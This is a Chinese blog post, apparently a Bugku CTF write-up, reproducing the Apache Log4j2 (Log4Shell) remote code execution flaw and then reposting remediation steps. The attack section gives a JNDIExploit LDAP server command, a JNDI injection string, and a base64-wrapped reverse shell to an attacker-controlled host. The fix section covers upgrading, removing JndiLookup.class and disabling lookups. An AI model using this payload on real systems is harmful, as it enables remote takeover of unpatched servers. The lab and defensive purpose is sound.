Apache_Log4j2_RCE漏洞复现

漏洞描述:

          Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。


影响范围:

Apache Log4j 2.x < 2.15.0-rc2

利用bugku中的题来复现该漏洞

Apache_Log4j2_RCE漏洞复现_第1张图片

 在公网搭建自己的LDAP服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i x.x.x.x

同时开启监听(新建终端)监听55555端口

Apache_Log4j2_RCE漏洞复现_第2张图片

在输入框输入 密码随便输

${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/base64加密后命令} 

base64加密后的命令:x.x.x.x:服务器开启的端口 -e bin/sh

提交以后查看服务器

Apache_Log4j2_RCE漏洞复现_第3张图片

flag{75721985087c8786c71df4607cf28d32}

修复方法转载
原文链接:https://blog.csdn.net/zhangmingcai/article/details/122407246

Apache_Log4j2_RCE漏洞修复方案

一、升级官方版本(推荐)

      目前Apache官方已发布最新版升级包,JAVA7版本升级至log4j 2.12.4版本,JAVA8及以上版本升级至log4j 2.17.0版本,升级包中移除了对lookup功能的支持,默认禁用了JNDI方法,该方法目前已经通过我行测试确认可修复。

二、移除log4j包中JndiLookup类(可能存在未知影响)

       移除log4j-core包中JndiLookup类文件,并重启服务,具体方法如下:

Linux系统:

zip -q -d log4j-core-*.jar   org/apache/logging/log4j/core/lookup/JndiLookup.class

Windows系统:

jar包解压缩,删除org/apache/logging/log4j/core/lookup/路径下 JndiLookup.class文件

三、修改Log4j配置(需评估是否影响业务)

        通过更改log4j配置达到缓解作用,具体更改配置如下:

(一)jvm启动参数添加:

-Dlog4j2.formatMsgNoLookups=True

(二)在应用classpath下添加

log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

需注意该方法的两项措施在log4j 2.10.0以下版本无效,可采取第二种修复方式。

你可能感兴趣的:(CTF,安全)